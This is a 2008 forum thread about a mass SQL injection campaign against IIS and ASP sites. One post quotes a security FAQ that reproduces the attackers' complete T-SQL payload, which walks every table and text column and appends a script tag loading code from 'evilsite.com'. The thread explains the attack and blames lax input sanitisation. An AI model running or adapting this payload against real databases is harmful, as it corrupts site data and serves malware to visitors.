IIS Servers Experience Massive Cyber Attack

tripwire45 · Apr 26, 2008

IIS Servers Experience Massive Cyber Attack

A massive cyber-attack is targeting vulnerable Internet Information Server based Web pages by redirecting visitors to the site toward one hosting malicious code, and it's growing rapidly. When Panda Security first noted the infestation, it put the number of infected IIS servers at 282,000. Less than a day later, security firm F-Secure wrote its own blog entry, putting the infestation at more than 500,000. The worst part of it all is that these infestations are not in seamy Web sites, they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe.

The full story can be found at ServerWatch.com.

hbroomhall · Apr 26, 2008

Interesting. Looking at the article you quote it says:

This article was originally published on InternetNews.com.
Click to expand...

If that was true then they did a remarkably poor job of paraphrasing the original. Among other things they say

The problem affects only IIS, not Apache or other Web servers.
Click to expand...

But the original article doesn't say this, mostly because it isn't a problem with the web servers, but a problem of SQL injection where the programmer has been incredibly lax and not bothered to sanitize queries from the Internet at large.

MSSQL and ASP are being targeted because it is easier to identify such a combo than MySQL or Postgres plus PHP/Perl/whatever, but non-IIS sites are being damaged as well. Just not in such numbers!

Not blaming you trip, IMHO it is the article you quote that is at fault here!

Harry.

neutralhills · Apr 26, 2008

It's all good. More infected machines means more work for me. w00t!

tripwire45 · Apr 26, 2008

hbroomhall said: ↑

Not blaming you trip, IMHO it is the article you quote that is at fault here!

Harry.
Click to expand...

Hmmm. Normally, this is a reliable source, but then, most of what I usually post of their is original material. I'll have to be more careful from now on. Thanks for the "heads up", Harry.

ffreeloader · Apr 29, 2008

Trip,

You weren't completely wrong. What is now surfacing is that this is a combination of poor coding practices, and the way IIS6 and SQL Server work together.

What follows is a part of a FAQ on the hackademix.net site for MS server admins showing them how to work around this problem.

#
The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
That said, the attackers are targeting IIS web servers which run ASP for a reason.
Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

This is the secret sauce which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology but its a feature, not a bug (no irony intended this time). Anyway, the chances for such powerful DB technology of being used in conjunction with web servers different than IIS are very low.
So, to recap:

1. Theres no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didnt really grow enough security awareness to develop safe internet-facing applications.
Click to expand...

The rest of this FAQ can be read at the following link.
http://hackademix.net/2008/04/26/mass-attack-faq/#iis

Crito · Apr 29, 2008

You get what you pay for.

Log in or Sign up

IIS Servers Experience Massive Cyber Attack

tripwire45 Zettabyte Poster

IIS Servers Experience Massive Cyber Attack

Comments

Share This Page

Navigation

Popular Forums

Useful Links

Log in or Sign up

IIS Servers Experience Massive Cyber Attack

tripwire45 Zettabyte Poster

IIS Servers Experience Massive Cyber Attack

Comments

Share This Page

Useful Searches